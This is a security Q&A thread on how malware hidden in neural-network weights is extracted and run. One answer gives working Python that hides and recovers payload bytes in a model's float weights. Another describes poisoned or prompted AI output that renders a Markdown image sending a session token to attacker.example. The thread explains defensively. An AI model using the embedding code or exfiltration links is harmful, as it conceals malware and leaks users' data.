
Lately, there has been discussion about malware hidden inside deep neural networks, such as EvilModel: Hiding Malware Inside of Neural Network Models (PDF).

I understand the hiding part, but I would like to know how that malware is assembled as a runnable program and actually run on the target machine. If a separate program is needed for that, how does that program get into the target machine?

2 Answers


... how that malware is assembled as a runnable program and actually run on the target machine.

The approach of embedding malware inside an AI model is essentially steganography, i.e. hiding some information (the malware) inside other information (an image, an AI model, ...). Additional tooling is still needed to extract the embedded malware from the model and execute it.
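
To make that concrete, here is a minimal sketch of the general technique, not the paper's actual tooling: payload bytes are hidden in, and later recovered from, the low-order byte of each 32-bit float weight. The one-byte-per-weight layout and all names here are illustrative assumptions.

```python
import numpy as np

def embed(weights: np.ndarray, payload: bytes) -> np.ndarray:
    """Overwrite the lowest mantissa byte of each float32 weight with one payload byte."""
    flat = weights.astype(np.float32).ravel().copy()
    raw = flat.view(np.uint8).reshape(-1, 4)          # 4 raw bytes per float32
    if len(payload) > raw.shape[0]:
        raise ValueError("payload larger than the carrier model")
    # Byte 0 is the least significant byte on a little-endian machine,
    # so each weight only changes by a tiny amount.
    raw[:len(payload), 0] = np.frombuffer(payload, dtype=np.uint8)
    return flat.reshape(weights.shape)

def extract(weights: np.ndarray, length: int) -> bytes:
    """Read the hidden bytes back out of the weights."""
    raw = np.ascontiguousarray(weights, dtype=np.float32).ravel().view(np.uint8)
    return raw.reshape(-1, 4)[:length, 0].tobytes()

# Demo: the weights are barely perturbed, yet the payload round-trips intact.
w = np.random.randn(10_000).astype(np.float32)
secret = b"stand-in for a malicious payload"
stego_w = embed(w, secret)
assert extract(stego_w, len(secret)) == secret
print("max weight change:", np.abs(stego_w - w).max())
```

The carrier model still loads and behaves like a normal model; the point is that a separate extractor (delivered or already present on the target) has to run the equivalent of `extract()` and then launch the recovered bytes.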

The idea behind such approaches is to provide an innocent-looking transport channel. To cite from the paper: "The delivery for commands, payloads, and other components must be conducted covertly and evasively to avoid malware being detected and traced."


One example: some AI systems produce HTML or Markdown output. If the model has been trained on malicious data, or if a system or user prompt is malicious, the rendered content could contain malicious links, images, or other elements, depending on which elements the application allows.

This could lead to XSS, unwanted file downloads, or extraction of the user's IP address or other information.
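
As a rough, hypothetical sketch of that rendering path, assume an application that feeds model output straight into a Markdown-to-HTML renderer without sanitizing it (the attacker.example URL and the leaked value are made up):

```python
import markdown  # pip install markdown

# Attacker-influenced model output (via poisoned training data or a malicious prompt).
untrusted_model_output = (
    "Here is your report.\n\n"
    "![chart](https://attacker.example/collect?leak=session-token-1234)"
)

# The Markdown image becomes an <img> tag. When the victim's browser renders
# the page, it fetches the attacker URL, revealing the user's IP address and
# whatever data was placed in the query string.
html = markdown.markdown(untrusted_model_output)
print(html)  # prints HTML containing <img ... src="https://attacker.example/collect?leak=...">
```

If the application also allows raw HTML or script elements in the rendered output, the same path escalates from information leakage to full XSS.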

